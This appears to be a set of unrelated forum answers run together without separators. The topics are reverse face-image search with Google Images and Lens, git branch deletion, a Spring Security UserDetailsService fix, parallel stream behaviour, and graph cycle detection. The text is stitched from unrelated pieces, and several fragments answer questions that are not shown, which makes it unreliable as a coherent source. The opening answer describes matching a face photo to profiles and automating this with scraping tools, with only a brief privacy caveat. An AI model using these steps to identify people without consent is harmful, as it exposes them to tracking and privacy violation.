Thanks a lot.
To crawl a face image using Google Image Search engine, follow these steps:
Go to Google Images.
Click on the camera icon (Upload an image).
Upload the face image or paste its URL.
Google will show visually similar images and related websites.
Open Google Lens in the Google app or Chrome.
Upload or scan the face image.
Lens provides matching images, profiles, and sources.
Use Selenium or BeautifulSoup with Google Search queries.
Use a face search engine to match image results programmatically.
Crawling face images without consent may violate privacy laws. Always follow ethical and legal guidelines.
There are 3 types of repos; you can delete a branch like below:
local repo -> git branch -d branch_name
origin repo -> git branch --delete --remotes origin/branch_name
upstream repo -> git branch --delete --remotes upstream/branch_name
I have not looked into this specifically from the APS side of things, but The Building Coder shares quite a few posts on setting up section boxes:
Check the newest suggested standards here: https://html.spec.whatwg.org/multipage/rendering.html#phrasing-content-3
Sorry, I can't find the about:blank sniffing technique that was referred to by ruakh
@Service("customuserdetails")
public class CustomUserDetails implements UserDetailsService {

    @Autowired
    private UserRepo userrepo;

    @Override
    public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
        Supplier<UsernameNotFoundException> s = () -> new UsernameNotFoundException("Error finding the user");
        User user = userrepo.findByUsername(username).orElseThrow(s);
        return user;
    }
}
This is the implementation that is working. I had to change my security beans to @Configuration, and I added @Repository to my repo interfaces. I also ended up changing my User class to implement UserDetails.
Here is a demo given by react flow on how to download a diagram as image https://reactflow.dev/examples/misc/download-image
I too faced a similar issue when using the parallel stream API.
Here is the scenario: I have a list of transaction objects in the reader part of a Spring Batch job. When this list is passed to the processor, I used a parallel stream to process the transaction objects in multi-threaded mode. Unfortunately, the parallel stream is not consistent; it skips records at times.
Has any fix been added to the java.util.stream API?
Use a set instead of an array for storing the visited nodes. Sets have O(1) lookup time, resulting in a total time complexity of O(n) for your algorithm, which is otherwise correct.
As for the statement that "going from node a to b to a isn't a cycle":
this is true if you consider simple graphs only, where you would have to use the same edge twice. In multigraphs you may have more than one edge connecting a and b, in which case a-b-a over distinct edges counts as a cycle.
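To make the first point concrete, a minimal sketch of the visited-set approach for a simple undirected graph (the adjacency-list representation and names are illustrative):

# Cycle detection with a visited set: O(1) membership checks, O(n) overall
def has_cycle(graph):
    visited = set()

    def dfs(node, parent):
        visited.add(node)
        for neighbor in graph[node]:
            if neighbor == parent:
                continue  # skip the edge we came from (simple graph)
            if neighbor in visited or dfs(neighbor, node):
                return True
        return False

    return any(dfs(n, None) for n in graph if n not in visited)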
Might be unrelated, but I just had an experience with this. The problem was the directory it was trying to build in, which at that time was the Desktop. I changed to a subfolder and it worked without any other steps required.